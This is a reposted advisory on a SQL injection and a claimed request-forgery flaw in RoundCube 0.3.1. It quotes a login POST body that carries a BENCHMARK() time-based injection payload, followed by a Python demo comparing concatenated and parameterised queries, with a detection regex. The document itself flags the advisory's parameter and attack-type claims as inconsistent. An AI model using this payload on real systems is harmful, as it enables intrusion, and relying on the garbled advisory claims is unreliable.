Source: 自学PHP网 (zixuephp.com)  Date: 2015-04-17 14:47  Author: (not given)
Title: RoundCube 0.3.1 SQL injection
Author: Smith Falcon (www.2cto.com)
Download: http://roundcube.net/download
Version: 0.3.1
Tested on: Linux

SQL injection [ POC ]

The advisory reports the _timezone parameter of the login request as vulnerable to SQL union injection. The proof-of-concept request it supplies, however, sends _timezone=_default_ untouched and puts the payload in _user, and that payload is a MySQL BENCHMARK() timing probe (URL-decoded: 1' or BENCHMARK(2500000,MD5(1)) or '1'='1), not a UNION query; what it can show is a measurable delay when the injected SQL is executed by the database. "POST" data sent to http://www.2cto.com /roundcube/index.php:

_pass=FrAmE30.&_url=_task=mail&_timezone=_default_&_token=cd5bf19253710dfd569f09bfab862ab3&_action=login&_user=1'+or+BENCHMARK(2500000%2CMD5(1))+or+'1'='1

XRF flaw [ POC ]

POST variable: changing _action=login to _action=anything shows that the site is vulnerable to XRF attacks (the advisory's term; presumably XSRF, cross-site request forgery). Replaying the request with the Live HTTP Headers browser extension yields a logged-in URL carrying _action=loggedin, which the advisory takes as showing that RoundCube 0.3.1 is vulnerable to XRF attacks; successful tampering leads to the username being compromised. Note that the request above already carries a _token value; the advisory does not say whether the replay succeeds without a valid _token, which is the question that decides whether the request can actually be forged cross-site.

Credits - iqZer0
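As an added example for the SQL injection section above (not code from the advisory or from RoundCube): the PoC's _user value run against a login query built by string concatenation and against a parameterised one. The query shape, the users table and the SQLite stand-ins for MySQL's BENCHMARK() and MD5() are assumptions made for the demo; RoundCube's real query is not on the page. The block also URL-decodes the field the way PHP's $_POST would and includes a small log-side check for timing-probe function names.

```python
import hashlib
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed copy of the POST body quoted in the advisory.
POC_BODY = (
    "_pass=FrAmE30.&_url=_task=mail&_timezone=_default_"
    "&_token=cd5bf19253710dfd569f09bfab862ab3&_action=login"
    "&_user=1'+or+BENCHMARK(2500000%2CMD5(1))+or+'1'='1"
)

# Functions used by time-based SQL injection probes (MySQL, PostgreSQL).
TIMING_PROBE = re.compile(r"\b(BENCHMARK|SLEEP|PG_SLEEP)\s*\(", re.IGNORECASE)


def post_param(body: str, name: str) -> str:
    """URL-decode one form field as PHP's $_POST would ('+' -> ' ', '%2C' -> ',')."""
    return parse_qs(body, keep_blank_values=True)[name][0]


def looks_like_timing_probe(value: str) -> bool:
    """Log-side check: does a submitted form value carry a timing-probe function call?"""
    return TIMING_PROBE.search(value) is not None


def concatenated_query(user: str, password: str) -> str:
    """Assumed vulnerable query shape (hypothetical; not RoundCube's actual code)."""
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (user, password))


class LoginDemo:
    """In-memory SQLite stand-in for the MySQL backend the payload targets."""

    def __init__(self) -> None:
        self.conn = sqlite3.connect(":memory:")
        self.benchmark_calls = 0
        # SQLite has no BENCHMARK()/MD5(); register stand-ins so the payload parses.
        self.conn.create_function("BENCHMARK", 2, self._benchmark)
        self.conn.create_function(
            "MD5", 1, lambda v: hashlib.md5(str(v).encode()).hexdigest())
        self.conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
        self.conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")

    def _benchmark(self, count: int, expr: str) -> int:
        # MySQL's BENCHMARK(count, expr) burns CPU `count` times and returns 0;
        # here we only count invocations, which is what proves the injected SQL ran.
        self.benchmark_calls += 1
        return 0

    def login_concat(self, user: str, password: str):
        """Vulnerable path: user input becomes SQL text."""
        self.benchmark_calls = 0
        rows = self.conn.execute(concatenated_query(user, password)).fetchall()
        return [r[0] for r in rows], self.benchmark_calls

    def login_param(self, user: str, password: str):
        """Fixed path: user input is bound as a value and never parsed as SQL."""
        self.benchmark_calls = 0
        rows = self.conn.execute(
            "SELECT username FROM users WHERE username = ? AND password = ?",
            (user, password),
        ).fetchall()
        return [r[0] for r in rows], self.benchmark_calls


if __name__ == "__main__":
    user, password = post_param(POC_BODY, "_user"), post_param(POC_BODY, "_pass")
    demo = LoginDemo()
    print("decoded _user:", user)
    print("timing probe? ", looks_like_timing_probe(user))
    print("concatenated: ", demo.login_concat(user, password))
    print("parameterised:", demo.login_param(user, password))
```

Against the assumed query shape, AND binds tighter than OR, so the page's payload is a delay probe rather than an authentication bypass: the concatenated query still returns no row, but BENCHMARK() is invoked for every row whose username does not match, which on a real MySQL backend is the observable delay. With placeholders the whole value is compared as a literal username and BENCHMARK() never executes.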